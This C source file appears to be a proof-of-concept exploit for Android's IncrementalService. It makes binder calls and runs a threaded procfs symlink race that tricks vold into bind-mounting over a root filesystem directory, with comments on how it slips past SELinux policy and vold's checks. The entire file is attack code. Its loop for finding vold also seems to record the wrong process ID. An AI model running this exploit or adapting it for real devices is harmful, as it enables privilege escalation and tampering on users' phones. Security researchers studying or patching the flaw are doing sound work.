#define _GNU_SOURCE
#include <pthread.h>
#include <fcntl.h>
#include <string.h>
#include <dirent.h>
#include <err.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <signal.h>
#include <sys/stat.h>
#include <sys/prctl.h>

#include "binder.h"

static struct binder_state *bs;

#define SVC_MGR_GET_SERVICE 1
#define SVC_MGR_CHECK_SERVICE 2
#define kHeader (('S'<<24)|('Y'<<16)|('S'<<8)|'T')
#define IncrementalService__createStorage 2
#define IncrementalService__makeBindMount 4
#define CREATE_MODE_CREATE 4
#define CREATE_MODE_OPEN_EXISTING 8
#define kNonNullParcelableFlag 1

#define OBJ_STATUS_LISTENER ((void*)0xf00dUL)
#define OBJ_HEALTH_LISTENER ((void*)0x7357UL)

/*
 * Path to the directory that we want to bind-mount over.
 * It doesn't have to be empty (vold tries to enforce that, but we can race that
 * check), but what is important is that:
 *  - vold can reach it
 *  - it is a directory
 *  - vold has `mounton` capability on it
 */
#define BIND_MOUNT_TARGET_DIR "/res"

uint32_t lookup_service(const char *name) {
  struct binder_io msg;
  struct binder_io reply;
  char data[0x1000];
  bio_init(&msg, data, sizeof(data), 4);

  // fields for Parcel::enforceInterface()
  bio_put_uint32(&msg, 0); // strictPolicy
  bio_put_uint32(&msg, 0); // workSource
  bio_put_uint32(&msg, kHeader);
  bio_put_string16_x(&msg, "android.os.IServiceManager");

  bio_put_string16_x(&msg, name);
  if (binder_call(bs, &msg, &reply, 0, SVC_MGR_CHECK_SERVICE, NULL))
    errx(1, "binder_call to servicemanager");
  printf("got reply from servicemanager\n");
  uint32_t status = bio_get_uint32(&reply);
  if (status != 0)
    errx(1, "servicemanager returned status 0x%x", status);
  uint32_t ref = bio_get_ref(&reply);
  if (ref == 0)
    errx(1, "servicemanager returned ref 0");
  binder_acquire(bs, ref);
  binder_done(bs, &msg, &reply);
  return ref;
}

/*
 * This helper flips `flip_fd` between `flip_fd_a` and `flip_fd_b`.
 * This has the effect of flipping the target of the jumped symlink at
 * `/proc/$pid/fd/$flip_fd`.
 * vold is prevented from accessing/following many symlinks via SELinux policy,
 * but the rule
 * `allow vold domain:{ file lnk_file } r_file_perms;`
 * means that vold is allowed to follow all the symlinks in per-process procfs
 * entries.
 */
static int flip_fd = -1, flip_fd_a = -1, flip_fd_b = -1;
static void *thread_fn(void *dummy) {
  while (1) {
    dup2(flip_fd_a, flip_fd);
    dup2(flip_fd_b, flip_fd);
  }
  return NULL;
}

int main(void) {
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);

  // find vold pid
  int vold_pid;
  {
    DIR *d = opendir("/proc");
    if (!d) err(1, "opendir");
    while (1) {
      struct dirent *dent = readdir(d);
      if (!dent)
        errx(1, "unable to find dir entry");
      if (dent->d_name[0] < '0' || dent->d_name[0] > '9')
        continue;
      char cmdline_path[400];
      sprintf(cmdline_path, "/proc/%s/cmdline", dent->d_name);
      int cmdline_fd = open(cmdline_path, O_RDONLY);
      if (cmdline_fd == -1)
        continue;
      char cmdline_buf[64+1];
      ssize_t read_res = read(cmdline_fd, cmdline_buf, 64);
      close(cmdline_fd);
      if (read_res <= 0)
        continue;
      cmdline_buf[read_res] = '\0';
      if (strcmp(cmdline_buf, "/system/bin/vold") == 0)
        break;
      vold_pid = atoi(dent->d_name);
    }
    closedir(d);
  }
  printf("VOLD is %d\n", vold_pid);

  bs = binder_open("/dev/binder", 0x400000);
  if (bs == NULL) err(1, "binder_open");
  uint32_t incremental_ref = lookup_service("incremental");
  printf("incremental_ref = %d\n", incremental_ref);

  // create or look up existing storage at /mnt/expand
  uint32_t storage_id;
  {
    struct binder_io msg;
    struct binder_io reply;
    char data[0x1000];
    bio_init(&msg, data, sizeof(data), 8);

    // fields for Parcel::enforceInterface()
    bio_put_uint32(&msg, 0); // strictPolicy
    bio_put_uint32(&msg, 0); // workSource
    bio_put_uint32(&msg, kHeader);
    bio_put_string16_x(&msg, "android.os.incremental.IIncrementalService");

    // path
    // /mnt/expand seems to work, but can cause breakage
    bio_put_string16_x(&msg, "/mnt/expand");
    // params
    bio_put_uint32(&msg, kNonNullParcelableFlag);
    uint32_t *params_parcelable_size_p = bio_alloc(&msg, sizeof(uint32_t));
    bio_put_uint32(&msg, 2); // DataLoaderType::INCREMENTAL

    // We're supposed to specify a DataLoader service (like
    // com.android.server.pm.PackageManagerShellCommandDataLoader), but it must
    // be exported to pass an access check against UID 2000.
    // So just specify some random exported service.
    bio_put_string16_x(&msg, "com.android.systemui"); // packageName
    bio_put_string16_x(&msg, "com.android.systemui.SystemUIService"); // className

    bio_put_string16_x(&msg, ""); // arguments
    *params_parcelable_size_p = msg.data - (char*)params_parcelable_size_p;
    // createMode
    bio_put_uint32(&msg, CREATE_MODE_CREATE | CREATE_MODE_OPEN_EXISTING);
    // statusListener
    bio_put_obj(&msg, OBJ_STATUS_LISTENER);
    bio_put_uint32(&msg, 0b001100); // Stability::Level::SYSTEM
    // healthCheckParams
    bio_put_uint32(&msg, kNonNullParcelableFlag);
    bio_put_uint32(&msg, 8); // _aidl_parcelable_size
    bio_put_uint32(&msg, 0);
    // healthListener
    bio_put_obj(&msg, OBJ_HEALTH_LISTENER);
    bio_put_uint32(&msg, 0b001100);

    if (binder_call(bs, &msg, &reply, incremental_ref,
                    IncrementalService__createStorage, NULL))
      errx(1, "binder_call to IncrementalService");
    printf("IncrementalService replied\n");
    uint32_t status = bio_get_uint32(&reply);
    if (status != 0)
      errx(1, "incrementalservice returned status 0x%x", status);
    storage_id = bio_get_uint32(&reply);
    if (storage_id == (unsigned)-1)
      errx(1, "incrementalservice returned ID -1");
    binder_done(bs, &msg, &reply);
  }
  printf("got storage ID %u\n\n\n", storage_id);

  /*
   * Mirror the part of the rootfs that we want to mount on into /sdcard as an
   * empty directory. We hope that vold will perform its checks on this copy in
   * /sdcard (through flip_fd_a), but then do the actual mounting outside
   * (through flip_fd_b).
   */
  system("mkdir -p /sdcard/"BIND_MOUNT_TARGET_DIR);
  if (chdir("/sdcard"))
    err(1, "chdir");

  pid_t no_fd_child = fork();
  if (no_fd_child == -1) err(1, "fork");
  if (no_fd_child == 0) {
    prctl(PR_SET_PDEATHSIG, SIGKILL);
    for (int i=0; i<100; i++) close(i);
    while (1) pause();
  }
  sleep(2);
  char empty_proc_dir[100];
  sprintf(empty_proc_dir, "/proc/%d/fd", no_fd_child);
  // Trying to mount on empty_proc_dir will fail at the last step because
  // "mounton" is rejected, but passes the other checks, so it's great for a
  // symlink race.
  flip_fd_a = open("/proc/self/", O_PATH);
  if (flip_fd_a == -1) err(1, "open /proc/self/");

  char flip_path_b[100];
  sprintf(flip_path_b, "/proc/%d", vold_pid);
  flip_fd_b = open(flip_path_b, O_PATH);
  if (flip_fd_b == -1) err(1, "open %s", flip_path_b);

  flip_fd = open("/", O_PATH);
  if (flip_fd == -1) err(1, "allocate flip_fd");

  char flip_fd_path[100];
  sprintf(flip_fd_path, "/proc/%d/fd/%d", getpid(), flip_fd);

  pthread_t thread;
  if (pthread_create(&thread, NULL, thread_fn, NULL))
    errx(1, "create thread");

  // bind-mount somewhere interesting
  for (int i=0; i<100; i++) {
    struct binder_io msg;
    struct binder_io reply;
    char data[0x1000];
    bio_init(&msg, data, sizeof(data), 8);

    // fields for Parcel::enforceInterface()
    bio_put_uint32(&msg, 0); // strictPolicy
    bio_put_uint32(&msg, 0); // workSource
    bio_put_uint32(&msg, kHeader);
    bio_put_string16_x(&msg, "android.os.incremental.IIncrementalService");
    
    // storageId
    bio_put_uint32(&msg, storage_id);
    // sourcePath
    bio_put_string16_x(&msg, ".");
    // targetFullPath
    char targetFullPath[200];
    sprintf(targetFullPath, "%s/cwd/"BIND_MOUNT_TARGET_DIR, flip_fd_path);
    bio_put_string16_x(&msg, targetFullPath);
    // bindType = BIND_TEMPORARY
    bio_put_uint32(&msg, 0);

    if (binder_call(bs, &msg, &reply, incremental_ref,
                    IncrementalService__makeBindMount, NULL))
      errx(1, "binder_call to IncrementalService");
    printf("IncrementalService replied\n");
    uint32_t status = bio_get_uint32(&reply);
    if (status != 0)
      errx(1, "incrementalservice returned status 0x%x", status);
    uint32_t bind_result = bio_get_uint32(&reply);
    binder_done(bs, &msg, &reply);
    if ((int)bind_result < 0) {
      printf("bind error: %s\n", strerror(-bind_result));
    } else {
      printf("bind result: %u\n", bind_result);
      exit(0);
    }
    printf("\n\n");
  }

  printf("END\n");
  while (1) pause();
}
